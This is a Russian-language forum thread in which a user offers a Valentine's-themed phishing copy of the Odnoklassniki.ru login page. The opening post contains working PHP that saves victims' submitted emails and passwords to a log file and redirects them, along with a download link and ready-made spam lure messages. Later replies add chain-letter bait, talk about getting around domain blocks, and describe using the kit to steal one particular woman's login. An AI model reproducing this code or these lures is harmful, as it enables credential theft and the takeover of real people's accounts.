Представляю вашему вниманию Фейк одноклассники.ру -=( LOVE )=- ВЫглядит вот так: Собсно скоро 14 февраля...день святого валентина.... поэтому и решил забацать фейк... Спамить можно так: Привет. С прошедшими прздниками тебя! Как у тебя дела? Подруга показала новые одноклассники, (линк на фейк) вообще суперский новогодний дизайн, вход как в обычные, токо очень красиво... Так я спамил под новый год... Кстати те кто напишет зачетное сообщение для спама этого фейка получать "спасибо" - кнопка такая:bs: Фейк надо малось настроить.. вот этот файлег act.php <?php $Mail = $_POST['email']; $Pass = $_POST['pass']; $text = "Email:$Mail Пароль:$Pass"; $filelog = fopen("бла бла бла.txt","a+"); fwrite($filelog,"\n $text \n"); fclose($filelog); echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=БЛА БЛА БлА/error.htm'></head></html>"; ?> заменяем бла бла бла... в первом случае: куда будут сохраняться логи во вотором: ссылку уже на залитый фейк на хость.... корочь путь на залитый фейк к файлу error.htm Качать тут: http://webfile.ru/3407309 пароль: 777 Если комуто понравилось..можете сказать спасибо Зы: приму в дар спамер или чекер от однокашек =)
Можно спамить както так: "Привет! Сайт Однокласники.ru ко дню Св. Валентина дарит всем влюбленным новый праздничный дизайн! Увидеть его можно <a href....>здесь</a>. Отправь это сообщение всем тем, кого ты любишь." Можно еще добавить: "Если ты не отправишь это сообщение 10 людям, то 14 февраля тебя бросит любимый человек, твой кот начнет ср**ь на диван, а рыбки в аквариуме сдох*** *** "
К то нибуть пробывал не так писать а Вконтакте работает хотя домен "tk" там тоже заблокирован... Пс Автор перезалей фейк а то уже удалили..
Мда сегодня был удивлен вот такое ссылкой ) Есть сайт с доменом.тк и вот что показал контакт при переходе...
Нет, сынок. Это фантастика. Любой домен - при попытке массовой рассылки - уйдет в бан в течении суток.
мне не для массовой рассылки..мне над чтоб одна блондинка перешла по ссылке и ввела свой лог и пас И усе) клавное чтоб была гиперссылка а не убирать там пробелы дописывать точку... она просто напросто не додумается и будет просить меня помочь ей..